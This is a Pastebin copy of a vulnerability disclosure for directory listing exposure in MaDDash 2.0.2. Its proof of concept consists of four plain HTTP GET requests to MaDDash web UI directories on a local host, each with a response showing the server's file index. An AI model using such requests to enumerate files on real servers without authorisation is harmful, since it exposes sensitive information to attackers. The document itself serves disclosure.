ManhNho

MaDDash 2.0.2 - Directory Listing

Jun 17th, 2018
1,131
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit Title: MaDDash 2.0.2 - Directory Listing
  2. # Date: 2018-06-18
  3. # Vendor: perfSONAR
  4. # Download Link: https://github.com/esnet/maddash/archive/master.zip
  5. # Version: 2.0.2
  6. # Exploit Author: ManhNho
  7. # CVE: CVE-2018-12522,CVE-2018-12523,CVE-2018-12524,CVE-2018-12525
  8. # Category: Webapps
  9. # Tested on: Windows 7
  10.  
  11. --- Description ---
  12. A directory listing is inappropriately exposed, yielding potentially sensitive information to attackers.
  13. A directory listing provides an attacker with the complete index of all the resources located inside of the directory.
  14. The specific risks and consequences vary depending on which files are listed and accessible.
  15.  
  16. ---Affected items---
  17. http://127.0.0.1/maddash-webui/etc/
  18. http://127.0.0.1/maddash-webui/lib/
  19. http://127.0.0.1/maddash-webui/images/
  20. http://127.0.0.1/maddash-webui/style/
  21.  
  22. --- PoC ---
  23.  
  24. [*] Request 1:
  25. GET /maddash-webui/etc/ HTTP/1.1
  26. Host: 127.0.0.1
  27. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
  28. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  29. Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
  30. Accept-Encoding: gzip, deflate
  31. Cookie: color=Gray Unknown
  32. Connection: close
  33. Upgrade-Insecure-Requests: 1
  34. Cache-Control: max-age=0
  35.  
  36. [*] Response 1:
  37. HTTP/1.1 200 OK
  38. Date: Sun, 17 Jun 2018 19:48:30 GMT
  39. Server: Apache/2.2.15 (CentOS)
  40. Content-Length: 876
  41. Connection: close
  42. Content-Type: text/html;charset=UTF-8
  43.  
  44. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  45. <html>
  46. <head>
  47. <title>Index of /maddash-webui/etc</title>
  48. </head>
  49. <body>
  50. <h1>Index of /maddash-webui/etc</h1>
  51. --------------------------------------------------------------------------------------
  52.  
  53. [*] Request 2:
  54. GET /maddash-webui/lib/ HTTP/1.1
  55. Host: 127.0.0.1
  56. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
  57. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  58. Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
  59. Accept-Encoding: gzip, deflate
  60. Cookie: color=Gray Unknown
  61. Connection: close
  62. Upgrade-Insecure-Requests: 1
  63. Cache-Control: max-age=0
  64.  
  65. [*] Response 2:
  66. HTTP/1.1 200 OK
  67. Date: Sun, 17 Jun 2018 19:48:31 GMT
  68. Server: Apache/2.2.15 (CentOS)
  69. Content-Length: 2555
  70. Connection: close
  71. Content-Type: text/html;charset=UTF-8
  72.  
  73. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  74. <html>
  75. <head>
  76. <title>Index of /maddash-webui/lib</title>
  77. </head>
  78. <body>
  79. <h1>Index of /maddash-webui/lib</h1>
  80. --------------------------------------------------------------------------------------
  81.  
  82. [*] Request 3:
  83. GET /maddash-webui/style/ HTTP/1.1
  84. Host: 127.0.0.1
  85. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
  86. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  87. Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
  88. Accept-Encoding: gzip, deflate
  89. Cookie: color=Gray Unknown
  90. Connection: close
  91. Upgrade-Insecure-Requests: 1
  92.  
  93. [*] Response 3:
  94. HTTP/1.1 200 OK
  95. Date: Sun, 17 Jun 2018 19:52:51 GMT
  96. Server: Apache/2.2.15 (CentOS)
  97. Content-Length: 1928
  98. Connection: close
  99. Content-Type: text/html;charset=UTF-8
  100.  
  101. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  102. <html>
  103. <head>
  104. <title>Index of /maddash-webui/style</title>
  105. </head>
  106. <body>
  107. <h1>Index of /maddash-webui/style</h1>
  108. --------------------------------------------------------------------------------------
  109.  
  110. [*] Request 4:
  111. GET /maddash-webui/images/ HTTP/1.1
  112. Host: 127.0.0.1
  113. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
  114. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  115. Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
  116. Accept-Encoding: gzip, deflate
  117. Cookie: color=Gray Unknown
  118. Connection: close
  119. Upgrade-Insecure-Requests: 1
  120.  
  121. [*] Response 4:
  122. HTTP/1.1 200 OK
  123. Date: Sun, 17 Jun 2018 19:53:02 GMT
  124. Server: Apache/2.2.15 (CentOS)
  125. Content-Length: 2143
  126. Connection: close
  127. Content-Type: text/html;charset=UTF-8
  128.  
  129. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  130. <html>
  131. <head>
  132. <title>Index of /maddash-webui/images</title>
  133. </head>
  134. <body>
  135. <h1>Index of /maddash-webui/images</h1>
RAW Paste Data